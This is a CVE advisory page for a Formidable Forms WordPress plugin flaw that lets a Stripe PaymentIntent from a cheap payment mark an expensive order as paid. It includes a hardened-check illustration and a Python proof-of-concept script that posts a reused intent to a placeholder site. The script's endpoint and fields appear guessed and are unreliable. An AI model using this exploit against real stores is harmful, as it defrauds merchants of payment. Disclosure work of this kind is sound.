Security Vulnerability Report
CVE-2026-2890 CVSS 7.5 HIGH

Published: 2026-03-13 19:54:35
Last Modified: 2026-04-22 21:30:26

Description

The Formidable Forms plugin for WordPress is vulnerable to a payment integrity bypass in all versions up to, and including, 6.28. This is due to the Stripe Link return handler (`handle_one_time_stripe_link_return_url`) marking payment records as complete based solely on the Stripe PaymentIntent status without comparing the intent's charged amount against the expected payment amount, and the `verify_intent()` function validating only client secret ownership without binding intents to specific forms or actions. This makes it possible for unauthenticated attackers to reuse a PaymentIntent from a completed low-value payment to mark a high-value payment as complete, effectively bypassing payment for goods or services.
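The two checks the description contrasts, as an added illustration that is not code from the advisory or from the Formidable Forms plugin: a status-only check beside one that binds a PaymentIntent to the amount, form and action it was created for. The intent is a constructed dict shaped like Stripe's PaymentIntent object (status, amount_received, currency, metadata); the metadata keys and the "consumed" set are assumptions for illustration.

```python
# Constructed sample: a succeeded intent from a $1.00 payment made for
# form 7 / payment action 12. In a real handler the intent would be fetched
# server-side from Stripe with the secret key, never taken from the client.
SMALL_INTENT = {
    "id": "pi_constructed_small",
    "status": "succeeded",
    "amount_received": 100,  # cents
    "currency": "usd",
    "metadata": {"form_id": "7", "action_id": "12"},  # assumed binding keys
}


def vulnerable_mark_complete(intent: dict) -> bool:
    """Status-only check, the behaviour the advisory describes."""
    return intent["status"] == "succeeded"


def hardened_mark_complete(intent: dict, expected_amount: int,
                           expected_currency: str, form_id, action_id,
                           consumed: set) -> tuple[bool, str]:
    """Accept the intent only for the exact payment record it was created for."""
    if intent["status"] != "succeeded":
        return False, "intent not succeeded"
    # Charged amount and currency must equal the order, not just "some money arrived".
    if (intent["amount_received"] != expected_amount
            or intent["currency"] != expected_currency):
        return False, "amount/currency mismatch"
    # The intent must have been created for this form and this payment action.
    meta = intent.get("metadata", {})
    if meta.get("form_id") != str(form_id) or meta.get("action_id") != str(action_id):
        return False, "intent not bound to this form/action"
    # One intent settles at most one payment record (replay protection).
    if intent["id"] in consumed:
        return False, "intent already used"
    consumed.add(intent["id"])
    return True, "ok"
```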

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No configuration data available.

Formidable Forms < 6.28

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
"""
CVE-2026-2890 Payment Integrity Bypass PoC
Formidable Forms Stripe Link Payment Bypass
"""
import requests

TARGET_URL = "https://vulnerable-site.com/wp-json/formidable/stripe/link/return"


def exploit_payment_bypass():
    """
    Attack scenario:
    1. Attacker completes a small legitimate payment ($1) to get a valid PaymentIntent
    2. Attacker captures the PaymentIntent ID
    3. Attacker initiates a high-value purchase ($1000)
    4. Instead of paying $1000, attacker reuses the small payment's PaymentIntent
    5. System marks the $1000 order as paid based on PaymentIntent status alone
    """
    # Step 1: Get a legitimate PaymentIntent from a small payment
    small_payment_intent = "pi_legitimate_small_payment_intent_id"

    # Step 2: Craft request to mark high-value payment as complete
    payload = {
        "payment_intent_id": small_payment_intent,
        "client_secret": "small_payment_client_secret",
        "form_id": "high_value_form_id",
        "expected_amount": 100000,  # $1000.00 in cents
        "entry_id": "victim_entry_id",
    }

    # The vulnerable endpoint only checks PaymentIntent status,
    # not whether the amount matches expected_amount
    response = requests.post(TARGET_URL, json=payload)
    print(f"[*] Status Code: {response.status_code}")
    print(f"[*] Response: {response.text}")

    if response.status_code == 200:
        result = response.json()
        if result.get("success"):
            print("[!] VULNERABLE: Payment marked as complete!")
            print("[*] Attacker successfully bypassed payment for high-value order")
            return True

    print("[*] Exploit failed or target not vulnerable")
    return False


if __name__ == "__main__":
    exploit_payment_bypass()
```

References

https://plugins.trac.wordpress.org/browser/formidable/tags/6.28/stripe/controllers/FrmStrpLiteHooksController.php#L92
https://plugins.trac.wordpress.org/browser/formidable/tags/6.28/stripe/controllers/FrmStrpLiteLinkController.php#L429
https://plugins.trac.wordpress.org/browser/formidable/tags/6.28/stripe/controllers/FrmStrpLiteLinkController.php#L79
https://www.wordfence.com/threat-intel/vulnerabilities/id/ebb4bc5a-9469-4733-acf3-d2dda5edb7af?source=cve

Weakness: CWE-862
Record status: Deferred